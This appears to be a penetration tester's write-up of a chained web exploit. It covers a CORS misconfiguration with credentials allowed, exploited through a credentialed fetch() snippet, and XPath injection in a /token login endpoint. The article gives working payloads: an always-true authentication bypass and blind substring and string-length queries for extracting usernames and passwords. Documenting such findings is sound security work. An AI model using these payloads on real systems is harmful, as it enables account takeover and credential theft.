During an assesment, I uncovered a chain of exploits that began with a CORS misconfiguration and culminated in an account takeover / authentication bypass via XPath injection in an API endpoint. This article will describe the essentials of CORS, XPATH injections, and the way I was able to exploit the chain.
Basics#
What Is CORS?#
Cross-Origin Resource Sharing (CORS) is a security feature implemented in web browsers that allows web pages to make requests to a different domain than the one that served the web page. In simpler terms, it enables a web application running on one domain to request resources from another domain securely.
Same-Origin Policy#
To understand CORS, it’s essential to understand the same-origin policy, a fundamental security concept in web development. By default, a web browser restricts scripts on a web page from making requests to a different domain. This means a script loaded from one origin cannot interact with resources from another origin.
An origin is defined by three components:
- Protocol: The communication method (e.g.,
http,https) - Host: (domain and subdomain, e.g.,
example.com,api.example.com) - Port: The server port number (e.g.,
:80,:443)
For example:
https://www.example.comandhttps://api.example.comare different origins because the subdomains (Host) differhttp://www.example.comandhttps://www.example.comare different origins because the protocols differ
How Does CORS Work?#
CORS provides a way for the server to relax the same-origin policy by specifying who can access its resourcesy. It does this through HTTP headers that tell the browser whether to allow a web page to access resources from a different origin.
Allowed Origins#
GET /page HTTP/1.1
Host: example.com
Origin: https://www.example.com
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.example.com
When sending a request with the Origin header set, the webserver will respond with the Access-Control-Allow-Origin header, and if allowed, the requested Origin.
Authentication#
HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://www.example.com
Access-Control-Allow-Credentials: true
If the allow credentials header is configured, the browser is instructed to include authentication credentials, e.g. cookies, in the request automatically.
What Is XPath?#
XPath (XML Path Language) is a query language used for selecting nodes from an XML document. It allows you to navigate through elements and attributes in an XML document, making it easier to extract and manipulate data.
Basic Concepts#
Nodes: The fundamental units in an XML document, including elements, attributes, text, and comments.
<library>
<book category="fiction">
<title>The Adventures of Tom Sawyer</title>
<author>Mark Twain</author>
</book>
<book category="non-fiction">
<title>A Brief History of Time</title>
<author>Stephen Hawking</author>
</book>
</library>
Expressions: XPath uses path expressions to select nodes or node sets in an XML document.
Select the First
Element
/library/book[1]
Select
Elements with a Specific Attribute
/book[@category='fiction']
The Exploit#
Endpoint Enumeration#
The first step in any penetration test involves mapping out the application’s attack surface. Normally, I begin by enumerating the API endpoints of the target. However, every endpoint I discovered required an authentication bearer token, preventing any further interaction without valid credentials
CORS Misconfiguration#
While enumerating the application, I noticed that there was a CORS misconfiguration regarding allowed origins. Upon sending a request containing arbitrary Origins, I got the following responses.
GET / HTTP/1.1
Host: target.com
Origin: https://www.attacker.com
HTTP/1.1 200 OK
Access-control-allow-origin: attacker.com
Access-Control-Allow-Credentials: true
The Access-Control-Allow-Origin header was set to a wildcard, effectively allowing any origin to access the resources. Combined with Access-Control-Allow-Credentials: true, this meant that browsers would include cookies and authentication credentials in cross-origin requests.
Exploiting CORS#
fetch('https://target-application.com/protected-endpoint', {
method: 'GET',
credentials: 'include' // Tell the browser to include saved credentials
})
.then(response => response.json())
.then(data => {
console.log(data);
// Potentially exfiltrate data to attacker-controlled server
});
This script attempts to access a protected endpoint, with the browser including any credentials due to the misconfigured CORS policy. That essentially means, that we can use the victims session to interact with the protected API functions. Now that we bypassed the protected endpoints, let us check if there are any vulneratbillities within those API functions.
Exploiting XPath#
During recon I found an endpoint called /token. This endpoint is essentially used to login via POST parameters (username, password) and retreive an API bearer token, which can then be used to access and use the API functions. Here, different users had different access rights on different endpoints.
The endpoint is using an XML document as a Database. Here, XPath queries are used to search for a user:password combination in the Database and authenticate them. A basic query might look something like this:
/root/*[password='Test123' and username='MyUser']
Injection Payload#
POST /token HTTP/1.1
Host: target-application.com
Content-Type: application/x-www-form-urlencoded
username=' or '1'='1&password=' or '1'='1
This payload (URL encoded) injects an always-true condition into the XPath query. The backend likely executed a query similar to:
/root/*[password='' or '1'='1' and username='' or '1'='1']
Given the injected condition, the query most likely returns / uses the first user in the XML database, effectively bypassing authentication controls and providing me with a valid Bearer Token for that account, which I can then use to access their API functions.
Enumerating Users#
To escalate the attack, we can try to enumerate usernames and extract passwords using XPath functions like starts-with() and substring(). By iterating over character positions and possible values, we can try to reconstructed usernames and passwords, gaining access to multiple accounts.
POST /token HTTP/1.1
Host: target-application.com
Content-Type: application/x-www-form-urlencoded
username=' or string-length(username)=5 and '1'='1&password=irrelevant
POST /token HTTP/1.1
Host: target-application.com
Content-Type: application/x-www-form-urlencoded
username=' or substring(username,1,1)='a' and '1'='1&password=irrelevant
Conclusion#
This engagement underscored how a seemingly minor issues can be chained together for significant impact. A CORS misconfiguration allowed me to bypass the same-origin policy, and an XPath injection in the authentication mechanism enabled full account compromise.